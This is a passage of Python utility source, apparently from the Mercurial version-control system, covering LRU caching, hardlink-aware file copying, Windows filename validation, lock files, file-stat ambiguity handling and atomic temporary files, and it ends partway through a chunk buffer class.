1655 1655 #
1656 1656 # If we only removed the minimum number of nodes to free enough
1657 1657 # cost at insert time, chances are high that the next insert would
1658 1658 # also require pruning. This would effectively constitute quadratic
1659 1659 # behavior for insert-heavy workloads. To mitigate this, we set a
1660 1660 # target cost that is a percentage of the max cost. This will tend
1661 1661 # to free more nodes when the high water mark is reached, which
1662 1662 # lowers the chances of needing to prune on the subsequent insert.
1663 1663 targetcost = int(self.maxcost * 0.75)
1664 1664
1665 1665 n = self._head.prev
1666 1666 while n.key is _notset:
1667 1667 n = n.prev
1668 1668
1669 1669 while len(self) > 1 and self.totalcost > targetcost:
1670 1670 del self._cache[n.key]
1671 1671 self.totalcost -= n.cost
1672 1672 n.markempty()
1673 1673 n = n.prev
1674 1674
1675 1675
1676 1676 def lrucachefunc(func):
1677 1677 '''cache most recent results of function calls'''
1678 1678 cache = {}
1679 1679 order = collections.deque()
1680 1680 if func.__code__.co_argcount == 1:
1681 1681
1682 1682 def f(arg):
1683 1683 if arg not in cache:
1684 1684 if len(cache) > 20:
1685 1685 del cache[order.popleft()]
1686 1686 cache[arg] = func(arg)
1687 1687 else:
1688 1688 order.remove(arg)
1689 1689 order.append(arg)
1690 1690 return cache[arg]
1691 1691
1692 1692 else:
1693 1693
1694 1694 def f(*args):
1695 1695 if args not in cache:
1696 1696 if len(cache) > 20:
1697 1697 del cache[order.popleft()]
1698 1698 cache[args] = func(*args)
1699 1699 else:
1700 1700 order.remove(args)
1701 1701 order.append(args)
1702 1702 return cache[args]
1703 1703
1704 1704 return f
1705 1705
1706 1706
1707 1707 class propertycache(object):
1708 1708 def __init__(self, func):
1709 1709 self.func = func
1710 1710 self.name = func.__name__
1711 1711
1712 1712 def __get__(self, obj, type=None):
1713 1713 result = self.func(obj)
1714 1714 self.cachevalue(obj, result)
1715 1715 return result
1716 1716
1717 1717 def cachevalue(self, obj, value):
1718 1718 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1719 1719 obj.__dict__[self.name] = value
1720 1720
1721 1721
1722 1722 def clearcachedproperty(obj, prop):
1723 1723 '''clear a cached property value, if one has been set'''
1724 1724 prop = pycompat.sysstr(prop)
1725 1725 if prop in obj.__dict__:
1726 1726 del obj.__dict__[prop]
1727 1727
1728 1728
1729 1729 def increasingchunks(source, min=1024, max=65536):
1730 1730 '''return no less than min bytes per chunk while data remains,
1731 1731 doubling min after each chunk until it reaches max'''
1732 1732
1733 1733 def log2(x):
1734 1734 if not x:
1735 1735 return 0
1736 1736 i = 0
1737 1737 while x:
1738 1738 x >>= 1
1739 1739 i += 1
1740 1740 return i - 1
1741 1741
1742 1742 buf = []
1743 1743 blen = 0
1744 1744 for chunk in source:
1745 1745 buf.append(chunk)
1746 1746 blen += len(chunk)
1747 1747 if blen >= min:
1748 1748 if min < max:
1749 1749 min = min << 1
1750 1750 nmin = 1 << log2(blen)
1751 1751 if nmin > min:
1752 1752 min = nmin
1753 1753 if min > max:
1754 1754 min = max
1755 1755 yield b''.join(buf)
1756 1756 blen = 0
1757 1757 buf = []
1758 1758 if buf:
1759 1759 yield b''.join(buf)
1760 1760
1761 1761
1762 1762 def always(fn):
1763 1763 return True
1764 1764
1765 1765
1766 1766 def never(fn):
1767 1767 return False
1768 1768
1769 1769
1770 1770 def nogc(func):
1771 1771 """disable garbage collector
1772 1772
1773 1773 Python's garbage collector triggers a GC each time a certain number of
1774 1774 container objects (the number being defined by gc.get_threshold()) are
1775 1775 allocated even when marked not to be tracked by the collector. Tracking has
1776 1776 no effect on when GCs are triggered, only on what objects the GC looks
1777 1777 into. As a workaround, disable GC while building complex (huge)
1778 1778 containers.
1779 1779
1780 1780 This garbage collector issue have been fixed in 2.7. But it still affect
1781 1781 CPython's performance.
1782 1782 """
1783 1783
1784 1784 def wrapper(*args, **kwargs):
1785 1785 gcenabled = gc.isenabled()
1786 1786 gc.disable()
1787 1787 try:
1788 1788 return func(*args, **kwargs)
1789 1789 finally:
1790 1790 if gcenabled:
1791 1791 gc.enable()
1792 1792
1793 1793 return wrapper
1794 1794
1795 1795
1796 1796 if pycompat.ispypy:
1797 1797 # PyPy runs slower with gc disabled
1798 1798 nogc = lambda x: x
1799 1799
1800 1800
1801 1801 def pathto(root, n1, n2):
1802 1802 '''return the relative path from one place to another.
1803 1803 root should use os.sep to separate directories
1804 1804 n1 should use os.sep to separate directories
1805 1805 n2 should use "/" to separate directories
1806 1806 returns an os.sep-separated path.
1807 1807
1808 1808 If n1 is a relative path, it's assumed it's
1809 1809 relative to root.
1810 1810 n2 should always be relative to root.
1811 1811 '''
1812 1812 if not n1:
1813 1813 return localpath(n2)
1814 1814 if os.path.isabs(n1):
1815 1815 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1816 1816 return os.path.join(root, localpath(n2))
1817 1817 n2 = b'/'.join((pconvert(root), n2))
1818 1818 a, b = splitpath(n1), n2.split(b'/')
1819 1819 a.reverse()
1820 1820 b.reverse()
1821 1821 while a and b and a[-1] == b[-1]:
1822 1822 a.pop()
1823 1823 b.pop()
1824 1824 b.reverse()
1825 1825 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1826 1826
1827 1827
1828 1828 # the location of data files matching the source code
1829 1829 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != b'macosx_app':
1830 1830 # executable version (py2exe) doesn't support __file__
1831 1831 datapath = os.path.dirname(pycompat.sysexecutable)
1832 1832 else:
1833 1833 datapath = os.path.dirname(pycompat.fsencode(__file__))
1834 1834
1835 1835 i18n.setdatapath(datapath)
1836 1836
1837 1837
1838 1838 def checksignature(func):
1839 1839 '''wrap a function with code to check for calling errors'''
1840 1840
1841 1841 def check(*args, **kwargs):
1842 1842 try:
1843 1843 return func(*args, **kwargs)
1844 1844 except TypeError:
1845 1845 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1846 1846 raise error.SignatureError
1847 1847 raise
1848 1848
1849 1849 return check
1850 1850
1851 1851
1852 1852 # a whilelist of known filesystems where hardlink works reliably
1853 1853 _hardlinkfswhitelist = {
1854 1854 b'apfs',
1855 1855 b'btrfs',
1856 1856 b'ext2',
1857 1857 b'ext3',
1858 1858 b'ext4',
1859 1859 b'hfs',
1860 1860 b'jfs',
1861 1861 b'NTFS',
1862 1862 b'reiserfs',
1863 1863 b'tmpfs',
1864 1864 b'ufs',
1865 1865 b'xfs',
1866 1866 b'zfs',
1867 1867 }
1868 1868
1869 1869
1870 1870 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1871 1871 '''copy a file, preserving mode and optionally other stat info like
1872 1872 atime/mtime
1873 1873
1874 1874 checkambig argument is used with filestat, and is useful only if
1875 1875 destination file is guarded by any lock (e.g. repo.lock or
1876 1876 repo.wlock).
1877 1877
1878 1878 copystat and checkambig should be exclusive.
1879 1879 '''
1880 1880 assert not (copystat and checkambig)
1881 1881 oldstat = None
1882 1882 if os.path.lexists(dest):
1883 1883 if checkambig:
1884 1884 oldstat = checkambig and filestat.frompath(dest)
1885 1885 unlink(dest)
1886 1886 if hardlink:
1887 1887 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1888 1888 # unless we are confident that dest is on a whitelisted filesystem.
1889 1889 try:
1890 1890 fstype = getfstype(os.path.dirname(dest))
1891 1891 except OSError:
1892 1892 fstype = None
1893 1893 if fstype not in _hardlinkfswhitelist:
1894 1894 hardlink = False
1895 1895 if hardlink:
1896 1896 try:
1897 1897 oslink(src, dest)
1898 1898 return
1899 1899 except (IOError, OSError):
1900 1900 pass # fall back to normal copy
1901 1901 if os.path.islink(src):
1902 1902 os.symlink(os.readlink(src), dest)
1903 1903 # copytime is ignored for symlinks, but in general copytime isn't needed
1904 1904 # for them anyway
1905 1905 else:
1906 1906 try:
1907 1907 shutil.copyfile(src, dest)
1908 1908 if copystat:
1909 1909 # copystat also copies mode
1910 1910 shutil.copystat(src, dest)
1911 1911 else:
1912 1912 shutil.copymode(src, dest)
1913 1913 if oldstat and oldstat.stat:
1914 1914 newstat = filestat.frompath(dest)
1915 1915 if newstat.isambig(oldstat):
1916 1916 # stat of copied file is ambiguous to original one
1917 1917 advanced = (
1918 1918 oldstat.stat[stat.ST_MTIME] + 1
1919 1919 ) & 0x7FFFFFFF
1920 1920 os.utime(dest, (advanced, advanced))
1921 1921 except shutil.Error as inst:
1922 1922 raise error.Abort(str(inst))
1923 1923
1924 1924
1925 1925 def copyfiles(src, dst, hardlink=None, progress=None):
1926 1926 """Copy a directory tree using hardlinks if possible."""
1927 1927 num = 0
1928 1928
1929 1929 def settopic():
1930 1930 if progress:
1931 1931 progress.topic = _(b'linking') if hardlink else _(b'copying')
1932 1932
1933 1933 if os.path.isdir(src):
1934 1934 if hardlink is None:
1935 1935 hardlink = (
1936 1936 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1937 1937 )
1938 1938 settopic()
1939 1939 os.mkdir(dst)
1940 1940 for name, kind in listdir(src):
1941 1941 srcname = os.path.join(src, name)
1942 1942 dstname = os.path.join(dst, name)
1943 1943 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1944 1944 num += n
1945 1945 else:
1946 1946 if hardlink is None:
1947 1947 hardlink = (
1948 1948 os.stat(os.path.dirname(src)).st_dev
1949 1949 == os.stat(os.path.dirname(dst)).st_dev
1950 1950 )
1951 1951 settopic()
1952 1952
1953 1953 if hardlink:
1954 1954 try:
1955 1955 oslink(src, dst)
1956 1956 except (IOError, OSError):
1957 1957 hardlink = False
1958 1958 shutil.copy(src, dst)
1959 1959 else:
1960 1960 shutil.copy(src, dst)
1961 1961 num += 1
1962 1962 if progress:
1963 1963 progress.increment()
1964 1964
1965 1965 return hardlink, num
1966 1966
1967 1967
1968 1968 _winreservednames = {
1969 1969 b'con',
1970 1970 b'prn',
1971 1971 b'aux',
1972 1972 b'nul',
1973 1973 b'com1',
1974 1974 b'com2',
1975 1975 b'com3',
1976 1976 b'com4',
1977 1977 b'com5',
1978 1978 b'com6',
1979 1979 b'com7',
1980 1980 b'com8',
1981 1981 b'com9',
1982 1982 b'lpt1',
1983 1983 b'lpt2',
1984 1984 b'lpt3',
1985 1985 b'lpt4',
1986 1986 b'lpt5',
1987 1987 b'lpt6',
1988 1988 b'lpt7',
1989 1989 b'lpt8',
1990 1990 b'lpt9',
1991 1991 }
1992 1992 _winreservedchars = b':*?"<>|'
1993 1993
1994 1994
1995 1995 def checkwinfilename(path):
1996 1996 r'''Check that the base-relative path is a valid filename on Windows.
1997 1997 Returns None if the path is ok, or a UI string describing the problem.
1998 1998
1999 1999 >>> checkwinfilename(b"just/a/normal/path")
2000 2000 >>> checkwinfilename(b"foo/bar/con.xml")
2001 2001 "filename contains 'con', which is reserved on Windows"
2002 2002 >>> checkwinfilename(b"foo/con.xml/bar")
2003 2003 "filename contains 'con', which is reserved on Windows"
2004 2004 >>> checkwinfilename(b"foo/bar/xml.con")
2005 2005 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2006 2006 "filename contains 'AUX', which is reserved on Windows"
2007 2007 >>> checkwinfilename(b"foo/bar/bla:.txt")
2008 2008 "filename contains ':', which is reserved on Windows"
2009 2009 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2010 2010 "filename contains '\\x07', which is invalid on Windows"
2011 2011 >>> checkwinfilename(b"foo/bar/bla ")
2012 2012 "filename ends with ' ', which is not allowed on Windows"
2013 2013 >>> checkwinfilename(b"../bar")
2014 2014 >>> checkwinfilename(b"foo\\")
2015 2015 "filename ends with '\\', which is invalid on Windows"
2016 2016 >>> checkwinfilename(b"foo\\/bar")
2017 2017 "directory name ends with '\\', which is invalid on Windows"
2018 2018 '''
2019 2019 if path.endswith(b'\\'):
2020 2020 return _(b"filename ends with '\\', which is invalid on Windows")
2021 2021 if b'\\/' in path:
2022 2022 return _(b"directory name ends with '\\', which is invalid on Windows")
2023 2023 for n in path.replace(b'\\', b'/').split(b'/'):
2024 2024 if not n:
2025 2025 continue
2026 2026 for c in _filenamebytestr(n):
2027 2027 if c in _winreservedchars:
2028 2028 return (
2029 2029 _(
2030 2030 b"filename contains '%s', which is reserved "
2031 2031 b"on Windows"
2032 2032 )
2033 2033 % c
2034 2034 )
2035 2035 if ord(c) <= 31:
2036 2036 return _(
2037 2037 b"filename contains '%s', which is invalid " b"on Windows"
2038 2038 ) % stringutil.escapestr(c)
2039 2039 base = n.split(b'.')[0]
2040 2040 if base and base.lower() in _winreservednames:
2041 2041 return (
2042 2042 _(b"filename contains '%s', which is reserved " b"on Windows")
2043 2043 % base
2044 2044 )
2045 2045 t = n[-1:]
2046 2046 if t in b'. ' and n not in b'..':
2047 2047 return (
2048 2048 _(
2049 2049 b"filename ends with '%s', which is not allowed "
2050 2050 b"on Windows"
2051 2051 )
2052 2052 % t
2053 2053 )
2054 2054
2055 2055
2056 2056 if pycompat.iswindows:
2057 2057 checkosfilename = checkwinfilename
2058 2058 timer = time.clock
2059 2059 else:
2060 2060 checkosfilename = platform.checkosfilename
2061 2061 timer = time.time
2062 2062
2063 2063 if safehasattr(time, "perf_counter"):
2064 2064 timer = time.perf_counter
2065 2065
2066 2066
2067 2067 def makelock(info, pathname):
2068 2068 """Create a lock file atomically if possible
2069 2069
2070 2070 This may leave a stale lock file if symlink isn't supported and signal
2071 2071 interrupt is enabled.
2072 2072 """
2073 2073 try:
2074 2074 return os.symlink(info, pathname)
2075 2075 except OSError as why:
2076 2076 if why.errno == errno.EEXIST:
2077 2077 raise
2078 2078 except AttributeError: # no symlink in os
2079 2079 pass
2080 2080
2081 2081 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2082 2082 ld = os.open(pathname, flags)
2083 2083 os.write(ld, info)
2084 2084 os.close(ld)
2085 2085
2086 2086
2087 2087 def readlock(pathname):
2088 2088 try:
2089 2089 return readlink(pathname)
2090 2090 except OSError as why:
2091 2091 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2092 2092 raise
2093 2093 except AttributeError: # no symlink in os
2094 2094 pass
2095 2095 with posixfile(pathname, b'rb') as fp:
2096 2096 return fp.read()
2097 2097
2098 2098
2099 2099 def fstat(fp):
2100 2100 '''stat file object that may not have fileno method.'''
2101 2101 try:
2102 2102 return os.fstat(fp.fileno())
2103 2103 except AttributeError:
2104 2104 return os.stat(fp.name)
2105 2105
2106 2106
2107 2107 # File system features
2108 2108
2109 2109
2110 2110 def fscasesensitive(path):
2111 2111 """
2112 2112 Return true if the given path is on a case-sensitive filesystem
2113 2113
2114 2114 Requires a path (like /foo/.hg) ending with a foldable final
2115 2115 directory component.
2116 2116 """
2117 2117 s1 = os.lstat(path)
2118 2118 d, b = os.path.split(path)
2119 2119 b2 = b.upper()
2120 2120 if b == b2:
2121 2121 b2 = b.lower()
2122 2122 if b == b2:
2123 2123 return True # no evidence against case sensitivity
2124 2124 p2 = os.path.join(d, b2)
2125 2125 try:
2126 2126 s2 = os.lstat(p2)
2127 2127 if s2 == s1:
2128 2128 return False
2129 2129 return True
2130 2130 except OSError:
2131 2131 return True
2132 2132
2133 2133
2134 2134 try:
2135 2135 import re2
2136 2136
2137 2137 _re2 = None
2138 2138 except ImportError:
2139 2139 _re2 = False
2140 2140
2141 2141
2142 2142 class _re(object):
2143 2143 def _checkre2(self):
2144 2144 global _re2
2145 2145 try:
2146 2146 # check if match works, see issue3964
2147 2147 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2148 2148 except ImportError:
2149 2149 _re2 = False
2150 2150
2151 2151 def compile(self, pat, flags=0):
2152 2152 '''Compile a regular expression, using re2 if possible
2153 2153
2154 2154 For best performance, use only re2-compatible regexp features. The
2155 2155 only flags from the re module that are re2-compatible are
2156 2156 IGNORECASE and MULTILINE.'''
2157 2157 if _re2 is None:
2158 2158 self._checkre2()
2159 2159 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2160 2160 if flags & remod.IGNORECASE:
2161 2161 pat = b'(?i)' + pat
2162 2162 if flags & remod.MULTILINE:
2163 2163 pat = b'(?m)' + pat
2164 2164 try:
2165 2165 return re2.compile(pat)
2166 2166 except re2.error:
2167 2167 pass
2168 2168 return remod.compile(pat, flags)
2169 2169
2170 2170 @propertycache
2171 2171 def escape(self):
2172 2172 '''Return the version of escape corresponding to self.compile.
2173 2173
2174 2174 This is imperfect because whether re2 or re is used for a particular
2175 2175 function depends on the flags, etc, but it's the best we can do.
2176 2176 '''
2177 2177 global _re2
2178 2178 if _re2 is None:
2179 2179 self._checkre2()
2180 2180 if _re2:
2181 2181 return re2.escape
2182 2182 else:
2183 2183 return remod.escape
2184 2184
2185 2185
2186 2186 re = _re()
2187 2187
2188 2188 _fspathcache = {}
2189 2189
2190 2190
2191 2191 def fspath(name, root):
2192 2192 '''Get name in the case stored in the filesystem
2193 2193
2194 2194 The name should be relative to root, and be normcase-ed for efficiency.
2195 2195
2196 2196 Note that this function is unnecessary, and should not be
2197 2197 called, for case-sensitive filesystems (simply because it's expensive).
2198 2198
2199 2199 The root should be normcase-ed, too.
2200 2200 '''
2201 2201
2202 2202 def _makefspathcacheentry(dir):
2203 2203 return dict((normcase(n), n) for n in os.listdir(dir))
2204 2204
2205 2205 seps = pycompat.ossep
2206 2206 if pycompat.osaltsep:
2207 2207 seps = seps + pycompat.osaltsep
2208 2208 # Protect backslashes. This gets silly very quickly.
2209 2209 seps.replace(b'\\', b'\\\\')
2210 2210 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2211 2211 dir = os.path.normpath(root)
2212 2212 result = []
2213 2213 for part, sep in pattern.findall(name):
2214 2214 if sep:
2215 2215 result.append(sep)
2216 2216 continue
2217 2217
2218 2218 if dir not in _fspathcache:
2219 2219 _fspathcache[dir] = _makefspathcacheentry(dir)
2220 2220 contents = _fspathcache[dir]
2221 2221
2222 2222 found = contents.get(part)
2223 2223 if not found:
2224 2224 # retry "once per directory" per "dirstate.walk" which
2225 2225 # may take place for each patches of "hg qpush", for example
2226 2226 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2227 2227 found = contents.get(part)
2228 2228
2229 2229 result.append(found or part)
2230 2230 dir = os.path.join(dir, part)
2231 2231
2232 2232 return b''.join(result)
2233 2233
2234 2234
2235 2235 def checknlink(testfile):
2236 2236 '''check whether hardlink count reporting works properly'''
2237 2237
2238 2238 # testfile may be open, so we need a separate file for checking to
2239 2239 # work around issue2543 (or testfile may get lost on Samba shares)
2240 2240 f1, f2, fp = None, None, None
2241 2241 try:
2242 2242 fd, f1 = pycompat.mkstemp(
2243 2243 prefix=b'.%s-' % os.path.basename(testfile),
2244 2244 suffix=b'1~',
2245 2245 dir=os.path.dirname(testfile),
2246 2246 )
2247 2247 os.close(fd)
2248 2248 f2 = b'%s2~' % f1[:-2]
2249 2249
2250 2250 oslink(f1, f2)
2251 2251 # nlinks() may behave differently for files on Windows shares if
2252 2252 # the file is open.
2253 2253 fp = posixfile(f2)
2254 2254 return nlinks(f2) > 1
2255 2255 except OSError:
2256 2256 return False
2257 2257 finally:
2258 2258 if fp is not None:
2259 2259 fp.close()
2260 2260 for f in (f1, f2):
2261 2261 try:
2262 2262 if f is not None:
2263 2263 os.unlink(f)
2264 2264 except OSError:
2265 2265 pass
2266 2266
2267 2267
2268 2268 def endswithsep(path):
2269 2269 '''Check path ends with os.sep or os.altsep.'''
2270 2270 return (
2271 2271 path.endswith(pycompat.ossep)
2272 2272 or pycompat.osaltsep
2273 2273 and path.endswith(pycompat.osaltsep)
2274 2274 )
2275 2275
2276 2276
2277 2277 def splitpath(path):
2278 2278 '''Split path by os.sep.
2279 2279 Note that this function does not use os.altsep because this is
2280 2280 an alternative of simple "xxx.split(os.sep)".
2281 2281 It is recommended to use os.path.normpath() before using this
2282 2282 function if need.'''
2283 2283 return path.split(pycompat.ossep)
2284 2284
2285 2285
2286 2286 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2287 2287 """Create a temporary file with the same contents from name
2288 2288
2289 2289 The permission bits are copied from the original file.
2290 2290
2291 2291 If the temporary file is going to be truncated immediately, you
2292 2292 can use emptyok=True as an optimization.
2293 2293
2294 2294 Returns the name of the temporary file.
2295 2295 """
2296 2296 d, fn = os.path.split(name)
2297 2297 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2298 2298 os.close(fd)
2299 2299 # Temporary files are created with mode 0600, which is usually not
2300 2300 # what we want. If the original file already exists, just copy
2301 2301 # its mode. Otherwise, manually obey umask.
2302 2302 copymode(name, temp, createmode, enforcewritable)
2303 2303
2304 2304 if emptyok:
2305 2305 return temp
2306 2306 try:
2307 2307 try:
2308 2308 ifp = posixfile(name, b"rb")
2309 2309 except IOError as inst:
2310 2310 if inst.errno == errno.ENOENT:
2311 2311 return temp
2312 2312 if not getattr(inst, 'filename', None):
2313 2313 inst.filename = name
2314 2314 raise
2315 2315 ofp = posixfile(temp, b"wb")
2316 2316 for chunk in filechunkiter(ifp):
2317 2317 ofp.write(chunk)
2318 2318 ifp.close()
2319 2319 ofp.close()
2320 2320 except: # re-raises
2321 2321 try:
2322 2322 os.unlink(temp)
2323 2323 except OSError:
2324 2324 pass
2325 2325 raise
2326 2326 return temp
2327 2327
2328 2328
2329 2329 class filestat(object):
2330 2330 """help to exactly detect change of a file
2331 2331
2332 2332 'stat' attribute is result of 'os.stat()' if specified 'path'
2333 2333 exists. Otherwise, it is None. This can avoid preparative
2334 2334 'exists()' examination on client side of this class.
2335 2335 """
2336 2336
2337 2337 def __init__(self, stat):
2338 2338 self.stat = stat
2339 2339
2340 2340 @classmethod
2341 2341 def frompath(cls, path):
2342 2342 try:
2343 2343 stat = os.stat(path)
2344 2344 except OSError as err:
2345 2345 if err.errno != errno.ENOENT:
2346 2346 raise
2347 2347 stat = None
2348 2348 return cls(stat)
2349 2349
2350 2350 @classmethod
2351 2351 def fromfp(cls, fp):
2352 2352 stat = os.fstat(fp.fileno())
2353 2353 return cls(stat)
2354 2354
2355 2355 __hash__ = object.__hash__
2356 2356
2357 2357 def __eq__(self, old):
2358 2358 try:
2359 2359 # if ambiguity between stat of new and old file is
2360 2360 # avoided, comparison of size, ctime and mtime is enough
2361 2361 # to exactly detect change of a file regardless of platform
2362 2362 return (
2363 2363 self.stat.st_size == old.stat.st_size
2364 2364 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2365 2365 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2366 2366 )
2367 2367 except AttributeError:
2368 2368 pass
2369 2369 try:
2370 2370 return self.stat is None and old.stat is None
2371 2371 except AttributeError:
2372 2372 return False
2373 2373
2374 2374 def isambig(self, old):
2375 2375 """Examine whether new (= self) stat is ambiguous against old one
2376 2376
2377 2377 "S[N]" below means stat of a file at N-th change:
2378 2378
2379 2379 - S[n-1].ctime < S[n].ctime: can detect change of a file
2380 2380 - S[n-1].ctime == S[n].ctime
2381 2381 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2382 2382 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2383 2383 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2384 2384 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2385 2385
2386 2386 Case (*2) above means that a file was changed twice or more at
2387 2387 same time in sec (= S[n-1].ctime), and comparison of timestamp
2388 2388 is ambiguous.
2389 2389
2390 2390 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2391 2391 timestamp is ambiguous".
2392 2392
2393 2393 But advancing mtime only in case (*2) doesn't work as
2394 2394 expected, because naturally advanced S[n].mtime in case (*1)
2395 2395 might be equal to manually advanced S[n-1 or earlier].mtime.
2396 2396
2397 2397 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2398 2398 treated as ambiguous regardless of mtime, to avoid overlooking
2399 2399 by confliction between such mtime.
2400 2400
2401 2401 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2402 2402 S[n].mtime", even if size of a file isn't changed.
2403 2403 """
2404 2404 try:
2405 2405 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2406 2406 except AttributeError:
2407 2407 return False
2408 2408
2409 2409 def avoidambig(self, path, old):
2410 2410 """Change file stat of specified path to avoid ambiguity
2411 2411
2412 2412 'old' should be previous filestat of 'path'.
2413 2413
2414 2414 This skips avoiding ambiguity, if a process doesn't have
2415 2415 appropriate privileges for 'path'. This returns False in this
2416 2416 case.
2417 2417
2418 2418 Otherwise, this returns True, as "ambiguity is avoided".
2419 2419 """
2420 2420 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2421 2421 try:
2422 2422 os.utime(path, (advanced, advanced))
2423 2423 except OSError as inst:
2424 2424 if inst.errno == errno.EPERM:
2425 2425 # utime() on the file created by another user causes EPERM,
2426 2426 # if a process doesn't have appropriate privileges
2427 2427 return False
2428 2428 raise
2429 2429 return True
2430 2430
2431 2431 def __ne__(self, other):
2432 2432 return not self == other
2433 2433
2434 2434
2435 2435 class atomictempfile(object):
2436 2436 '''writable file object that atomically updates a file
2437 2437
2438 2438 All writes will go to a temporary copy of the original file. Call
2439 2439 close() when you are done writing, and atomictempfile will rename
2440 2440 the temporary copy to the original name, making the changes
2441 2441 visible. If the object is destroyed without being closed, all your
2442 2442 writes are discarded.
2443 2443
2444 2444 checkambig argument of constructor is used with filestat, and is
2445 2445 useful only if target file is guarded by any lock (e.g. repo.lock
2446 2446 or repo.wlock).
2447 2447 '''
2448 2448
2449 2449 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2450 2450 self.__name = name # permanent name
2451 2451 self._tempname = mktempcopy(
2452 2452 name,
2453 2453 emptyok=(b'w' in mode),
2454 2454 createmode=createmode,
2455 2455 enforcewritable=(b'w' in mode),
2456 2456 )
2457 2457
2458 2458 self._fp = posixfile(self._tempname, mode)
2459 2459 self._checkambig = checkambig
2460 2460
2461 2461 # delegated methods
2462 2462 self.read = self._fp.read
2463 2463 self.write = self._fp.write
2464 2464 self.seek = self._fp.seek
2465 2465 self.tell = self._fp.tell
2466 2466 self.fileno = self._fp.fileno
2467 2467
2468 2468 def close(self):
2469 2469 if not self._fp.closed:
2470 2470 self._fp.close()
2471 2471 filename = localpath(self.__name)
2472 2472 oldstat = self._checkambig and filestat.frompath(filename)
2473 2473 if oldstat and oldstat.stat:
2474 2474 rename(self._tempname, filename)
2475 2475 newstat = filestat.frompath(filename)
2476 2476 if newstat.isambig(oldstat):
2477 2477 # stat of changed file is ambiguous to original one
2478 2478 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2479 2479 os.utime(filename, (advanced, advanced))
2480 2480 else:
2481 2481 rename(self._tempname, filename)
2482 2482
2483 2483 def discard(self):
2484 2484 if not self._fp.closed:
2485 2485 try:
2486 2486 os.unlink(self._tempname)
2487 2487 except OSError:
2488 2488 pass
2489 2489 self._fp.close()
2490 2490
2491 2491 def __del__(self):
2492 2492 if safehasattr(self, '_fp'): # constructor actually did something
2493 2493 self.discard()
2494 2494
2495 2495 def __enter__(self):
2496 2496 return self
2497 2497
2498 2498 def __exit__(self, exctype, excvalue, traceback):
2499 2499 if exctype is not None:
2500 2500 self.discard()
2501 2501 else:
2502 2502 self.close()
2503 2503
2504 2504
2505 2505 def unlinkpath(f, ignoremissing=False, rmdir=True):
2506 2506 """unlink and remove the directory if it is empty"""
2507 2507 if ignoremissing:
2508 2508 tryunlink(f)
2509 2509 else:
2510 2510 unlink(f)
2511 2511 if rmdir:
2512 2512 # try removing directories that might now be empty
2513 2513 try:
2514 2514 removedirs(os.path.dirname(f))
2515 2515 except OSError:
2516 2516 pass
2517 2517
2518 2518
2519 2519 def tryunlink(f):
2520 2520 """Attempt to remove a file, ignoring ENOENT errors."""
2521 2521 try:
2522 2522 unlink(f)
2523 2523 except OSError as e:
2524 2524 if e.errno != errno.ENOENT:
2525 2525 raise
2526 2526
2527 2527
2528 2528 def makedirs(name, mode=None, notindexed=False):
2529 2529 """recursive directory creation with parent mode inheritance
2530 2530
2531 2531 Newly created directories are marked as "not to be indexed by
2532 2532 the content indexing service", if ``notindexed`` is specified
2533 2533 for "write" mode access.
2534 2534 """
2535 2535 try:
2536 2536 makedir(name, notindexed)
2537 2537 except OSError as err:
2538 2538 if err.errno == errno.EEXIST:
2539 2539 return
2540 2540 if err.errno != errno.ENOENT or not name:
2541 2541 raise
2542 2542 parent = os.path.dirname(os.path.abspath(name))
2543 2543 if parent == name:
2544 2544 raise
2545 2545 makedirs(parent, mode, notindexed)
2546 2546 try:
2547 2547 makedir(name, notindexed)
2548 2548 except OSError as err:
2549 2549 # Catch EEXIST to handle races
2550 2550 if err.errno == errno.EEXIST:
2551 2551 return
2552 2552 raise
2553 2553 if mode is not None:
2554 2554 os.chmod(name, mode)
2555 2555
2556 2556
2557 2557 def readfile(path):
2558 2558 with open(path, b'rb') as fp:
2559 2559 return fp.read()
2560 2560
2561 2561
2562 2562 def writefile(path, text):
2563 2563 with open(path, b'wb') as fp:
2564 2564 fp.write(text)
2565 2565
2566 2566
2567 2567 def appendfile(path, text):
2568 2568 with open(path, b'ab') as fp:
2569 2569 fp.write(text)
2570 2570
2571 2571
2572 2572 class chunkbuffer(object):
2573 2573 """Allow arbitrary sized chunks of data to be efficiently read from an
2574 2574 iterator over chunks of arbitrary size."""
2575 2575
2576 2576 def __init__(self, in_iter):
2577 2577 """in_iter is the iterator that's iterating over the input chunks."""
2578 2578
2579 2579 def splitbig(chunks):
2580 2580 for chunk in chunks:
2581 2581 if len(chunk) > 2 ** 20:
2582 2582 pos = 0
2583 2583 while pos < len(chunk):
2584 2584 end = pos + 2 ** 18
2585 2585 yield chunk[pos:end]
